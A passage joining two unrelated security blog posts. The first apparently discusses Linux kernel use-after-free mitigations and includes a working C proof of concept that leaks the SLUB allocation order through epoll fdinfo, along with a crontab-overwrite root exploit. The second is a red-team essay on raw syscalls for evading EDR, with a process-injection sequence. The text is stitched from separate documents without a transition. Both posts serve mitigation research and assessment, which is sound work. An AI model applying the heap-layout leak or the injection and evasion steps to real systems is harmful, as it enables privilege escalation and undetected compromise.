This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(0, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

  int epfd = SYSCHK(epoll_create1(0));
  for (int i=0; i<1000; i++)
    SYSCHK(eventfd(0, 0));
  for (int i=0; i<192; i++) {
    int fd = SYSCHK(eventfd(0, 0));
    struct epoll_event event = {
      .events = EPOLLIN,
      .data = { .u64 = i }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
  }

  char cmd[100];
  sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
  system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in a Ubuntu 20.10 VM (truncated, because it's a bit long):

user@ubuntuvm:~/epoll_fdinfo$ ./epoll_fdinfo 
pos:    0
flags:  02
mnt_id: 14
tfd:     1040 events:       19 data:               24  pos:0 ino:2f9a sdev:d
tfd:     1050 events:       19 data:               2e  pos:0 ino:2f9a sdev:d
tfd:     1024 events:       19 data:               14  pos:0 ino:2f9a sdev:d
tfd:     1029 events:       19 data:               19  pos:0 ino:2f9a sdev:d
tfd:     1048 events:       19 data:               2c  pos:0 ino:2f9a sdev:d
tfd:     1042 events:       19 data:               26  pos:0 ino:2f9a sdev:d
tfd:     1026 events:       19 data:               16  pos:0 ino:2f9a sdev:d
tfd:     1033 events:       19 data:               1d  pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of length 32 that consist of shuffled contiguous sequences of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
                             struct epoll_filefd *p2)
{
        return (p1->file > p2->file ? +1:
                (p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

root@ubuntuvm:/sys/kernel/slab/filp# cat order 
1
root@ubuntuvm:/sys/kernel/slab/filp# cat objs_per_slab 
32
root@ubuntuvm:/sys/kernel/slab/filp# 

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
  [ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
  [ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
  [ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
  [ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
  [ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
  [ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
  [ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
  if len(alloc_indices) != 32:
    continue
  # indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
  alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
  # reverse mapping: memory locations of allocations,
  # sorted by index of allocation ('data').
  # if we've observed all allocations in a page,
  # these will really be indices into the page.
  memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
  print(memory_location_by_index)
$ ./slub_demo.py 
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main usecase.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much of a relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification

the fanciful allure and utility of syscalls

12 May 2021 at 21:10

So over the years I’ve had a number of conversations about the utility of using syscalls in shellcode, C2s, or loaders in offsec tooling and red team ops. For reasons likely related to the increasing maturity of EDRs and their totalitarian grip in enterprise environments, I’ve seen an uptick in projects and blogs championing “raw syscalls” as a technique for evading AV/SIEM technologies. This post is an attempt to describe why I think the technique’s efficacy has been overstated and its utility stretched thin.

This diatribe is not meant to denigrate any one project or its utility; if your tool or payload uses syscalls instead of ntdll, great. The technique is useful under certain circumstances and can be valuable in attempts at evading EDR, particularly when combined with other strategies. What it’s not, however, is a silver bullet. It is not going to grant you any particularly interesting capability by virtue of evading a vendor data sink. Determining its efficacy in context of the execution chain is difficult, ambiguous at best. Your C2 is not advanced in EDR evasion by including a few ntdll stubs.

Note that when I’m talking about EDRs, I’m speaking specifically to modern samples with online and cloud-based machine learning capabilities, both attended and unattended. Crowdstrike Falcon, Cylance, CybeReason, Endgame, Carbon Black, and others have a wide array of ML strategies of varying quality. This post is not an analysis of these vendors’ user mode hooking capabilities.

Finally, this discussion’s perspective is that of post-exploitation, necessary for an attacker to issue a syscall anyway. User mode hooks can provide useful telemetry on user behavior prior to code execution (phishing stages), but once that’s achieved, all bets of process integrity are off.

syscalling

Very briefly, using raw syscalls is an old technique that obviates the need to use sanctioned APIs and instead uses assembly to execute certain functions exposed to user mode from the kernel. For example, if you wanted to read memory of another process, you might use NtReadVirtualMemory:

1
NtReadVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);

This function is exported by NTDLL; at runtime, the PE loader loads every DLL in its import directory table, then resolves all of the import address table (IAT) function pointers. When we call NtReadVirtualMemory our pointers are fixed up based on the resolved address of the function, bringing us to execute:

1
2
3
4
5
6
7
8
00007ffb`1676d4f0 4c8bd1           mov     r10, rcx
00007ffb`1676d4f3 b83f000000       mov     eax, 3Fh
00007ffb`1676d4f8 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)], 1
00007ffb`1676d500 7503             jne     ntdll!NtReadVirtualMemory+0x15 (00007ffb`1676d505)
00007ffb`1676d502 0f05             syscall 
00007ffb`1676d504 c3               ret     
00007ffb`1676d505 cd2e             int     2Eh
00007ffb`1676d507 c3               ret 

This stub, implemented in NTDLL, moves the syscall number (0x3f) into EAX and uses syscall or int 2e, depending on the system bitness, to transition to the kernel. At this point the kernel begins executing the routine tied to code 0x3f. There are plenty of resources on how the process works and what happens on the way back, so please refer elsewhere.

Modern EDRs will typically inject hooks, or detours, into the implementation of the function. This allows them to capture additional information about the context of the call for further analysis. In some cases the call can be outright blocked. As a red team, we obviously want to stymie this.

With that, I want to detail a few shortcomings with this technique that I’ve seen in many of the public implementations. Let me once again stress here that I’m not trying to denigrate these tools; they provide utility and have their use cases that cannot be ignored, which I hope to highlight below.

syscall values are not consistent

j00ru maintains the go-to source for both nt and win32k, and by blindly searching around on here you can see the shift in values between functions. Windows 10 alone currently has eleven columns for the different major builds of Win10, some functions shifting 4 or 5 times. This means that we either need to know ahead of time what build the victim is running and tailor the syscall stubs specifically (at worst cumbersome in a post-exp environment), or we need to dynamically generate the syscall number at runtime.

There are several proposed solutions to discovering the syscall at runtime: sorting Zw exports, reading the stubs directly out of the mapped NTDLL, querying j00ru’s Github repository (lol), or actually baking every potential code into the payload and selecting the correct one at runtime. These are all usable options, but everything here is either cumbersome or an unnecessary risk in raising our threat profile with the EDRs ML model.

Let’s say you attempt to read NTDLL off disk to discover the stubs; that requires issuing CreateFile and ReadFile calls, both triggering minifilter and ETW events, and potentially executing already established EDR hooks. Maybe that raises your threat profile a few percentage points, but you’re still golden. You then need to copy that stub out into an executable section, setup the stack/registers, and invoke. Optionally, you could use the already mapped NTDLL; that requires either GetProcAddress, walking PEB, or parsing out the IAT. Are these events surrounding the resolution of the stub more or less likely to increase the threat profile than just calling the NTDLL function itself?

The least-bad option of these is baking the codes into your payload and switching at runtime based on the detection of the system version. In memory this is going to look like an s-box switch, but there are no extraneous calls to in-memory or on-disk files or stumbles up or down the PEB. This is great, but cumbersome if you need to support a range of languages and execution environments, particularly those with on-demand or dynamic requirements.

syscall’s miss useful/critical functionality

In addition to ease of use in C/C++, user mode APIs provide additional functionality prior to hitting the kernel. This could be setting up/formatting arguments, exception or edge-case handling, SxS/activation contexts, etc. Without using these APIs and instead syscalling yourself, you’re missing out on this, for better or for worse. In some cases it means porting that behavior directly to your assembler stub or setting up the environment pre/post execution.

In some cases, like WriteProcessMemory or CreateRemoteThreadEx, it’s more “helpful” than actually necessary. In others, like CreateEnclave or CallEnclave, it’s virtually a requirement. If you’re angling to use only a specific set of functions (NtReadVirtualMemory/NtWriteVirtualMemory/etc) this might not be much of an issue, but expanding beyond that comes with great caveat.

the spooky functions are probably being called anyway

In general, syscalling is used to evade the use of some function known or suspected to be hooked in user mode. In certain scenarios we can guarantee that the syscall is the only way that hooked function is going to execute. In others, however, such as a more feature rich stage 0 or C2, we can’t guarantee this. Consider the following (pseudo-code):

1
2
3
4
UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

In the above we’ve opened a writable process handle, created a blob of memory, written into it, and started a thread to execute it. A very common process injection strategy. Setting aside the tsunami of information this feeds into the kernel, only dynamic instrumentation of the runtime would detect something like this. Any IAT or inline hooks are evaded.

But say your loader does a few other things, makes a few other calls to user32, dnsapi, kernel32, etc. Do you know that those functions don’t make calls into the very functions you’re attempting to avoid using? Now you could argue that by evading the hooks for more sensitive functionality (process injection), you’ve lowered your threat score with the EDR. This isn’t entirely true though because EDR isn’t blind to your remote thread (PsSetCreateThreadNotifyRoutine) or your writable process handle (ObRegisterCallbacks) or even your cross process memory write. So what you’ve really done is avoided sending contextualized telemetry to the kernel of the cross process injection — is that enough to avoid heightened scrutiny? Maybe.

Additionally, modern EDRs hook a ton of stuff (or at least some do). Most syscall projects and research focus on NTDLL; what about kernel32, user32, advapi32, wininet, etc? None of the syscall evasion is going to work here because, naturally, a majority of those don’t need to syscall into the kernel (or do via other ntdll functions…). For evasion coverage, then, you may need to both bolt on raw syscall support as well as a generic unhooking strategy for the other modules.

syscall’s are partially effective at escaping UM data sinks

Many user mode hooks themselves do not have proactive defense capabilities baked in. By and large they are used to gather telemetry on the call context to provide to the kernel driver or system service for additional analysis. This analysis, paired with what it’s gathered via ETW, kernel mode hooks, and other data sinks, forms a composite picture of the process since birth.

Let’s take the example of cross process code injection referenced above. Let’s also give your loader the benefit of the doubt and assume it’s triggered nothing and emitted little telemetry on its way to execution. When the following is run:

1
2
3
4
UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

We are firing off a ton of telemetry to the kernel and any listening drivers. Without a single user mode hook we would know:

  1. Process A opened a handle to Process B with X permissions (ObRegisterCallbacks)
  2. Process A allocated memory in Process B with X permissions (EtwTi)
  3. Process A wrote data into Process B VAS (EtwTi)
  4. Process A created a remote thread in Process B (PsSetCreateThreadNotifyRoutine, Etw)

It is true that EtwTi is newish and doesn’t capture everything, hence the partial effectiveness. But that argument grows thin overtime as adoption of the feed grows and the API matures.

A strong argument for syscalls here is that it evades custom data sinks. Up until now we’ve only considered what Microsoft provides, not what the vendor themselves might include in their hook routine, and how that telemetry might influence their agent’s model. Some vendors, for performance reasons, prefer to extract thread information at call time. Some capture all parameters and pack them into more consumable binary blobs for consumption in the kernel. Depending on what exactly the hook does, and its criticality to the bayesian model, this might be a great reason to use them.

your testing isn’t comprehensive or indicative of the general case

This is a more general gripe with some of the conversation on modern EDR evasion. Modern EDRs use a variety of learning heuristics to determine if an unknown binary is malicious or not; sometimes successfully, sometimes not. This model is initially trained on some set of data (depending on the vendor), but continues to grow based on its observations of the environment and data shared amongst nodes. This is generally known as online learning. On large deploys of new EDRs there is typically a learning or passive phase; that allows the model to collect baseline metrics of what is normal and, hopefully, identify anomalies or deviations thereafter.

Effectively then, given a long enough timeline, one enterprise’s agent model might be significantly different from another. This has a few implications. The first being, of course, that your lab environment is not an accurate representation of the client. While your syscall stub might work fine in the lab, unless it’s particularly novel, it’s entirely possible it’s been observed elsewhere.

This also means that pinpointing the reason why your payload works or doesn’t work is a bit of dark art. If your payload with the syscall evasion ends up working in a client environment, does that mean the evasion is successful, or would it have worked regardless of whether you used ntdll or not? If on the other hand your payload was blocked, can you identify the syscalls as the problem? Furthermore, if you add in evasion stubs and successfully execute, can we definitively point to the syscall evasion as the threat score culprit?

At this point, then, it’s a game of risk. You risk allowing the agent’s model to continue aggregating telemetry and improving its heuristic, and thereby the entire network’s model. Repeated testing taints the analysis chain as it grows to identify portions of your code as malicious or not; a fuzzy match, regardless of the function or assembler changes made. You also risk exposing the increased telemetry and details to the cloud which is then in the hands of both automated and manual tooling and analysis. If you disabled this portion, then, you also lack an accurate representation of detection capabilities.

